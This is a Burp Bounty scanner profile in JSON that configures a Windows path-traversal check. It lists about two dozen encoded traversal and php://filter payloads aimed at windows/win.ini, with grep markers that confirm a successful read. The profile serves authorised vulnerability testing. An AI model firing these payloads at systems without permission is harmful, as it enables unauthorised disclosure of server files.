[
  {
    "ProfileName": "PathTraversal_Windows",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini",
      "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini",
      "/./././././././././././windows/win.ini",
      "/../../../../../../../../../../../windows/win.ini",
      "/..\\../..\\../..\\../..\\../..\\../..\\../windows/win.ini",
      "/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini",
      "..//..//..//..//..//windows//win.ini",
      "../../../../../../../../../../../../windows/win.ini",
      "../../windows/win.ini",
      "..\\../..\\../..\\../..\\../windows/win.ini",
      "..\\../..\\../windows/win.ini",
      "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
      "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
      "/../../../../../../../../../../../windows/win.ini%00",
      "../../../../../../../../../../../../windows/win.ini%00",
      "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00",
      "/../../../../../../../../../../../windows/win.ini%00.html",
      "/../../../../../../../../../../../windows/win.ini%00.jpg",
      "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../windows/win.ini",
      "../../../../../../../../windows/win.ini",
      "..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
      "c:\\windows\\win.ini",
      "c:/windows/win.ini",
      "php://filter/zlib.deflate/convert.base64-encode/resource\u003dc:/windows/win.ini",
      "php://filter/zlib.deflate/convert.base64-encode/resource\u003dc:\\windows\\win.ini"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,for 16-bit app support",
      "true,Or,[fonts]"
    ],
    "Tags": [
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": true,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "PathTraversal_Windows",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt\u003cbr/\u003e\u003cbr/\u003e\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal\u003cbr/\u003e\u003cbr/\u003e\nhttps://github.com/soffensive/windowsblindread",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      32,
      36,
      1,
      2,
      6,
      5,
      35,
      34,
      64,
      0,
      3,
      4
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]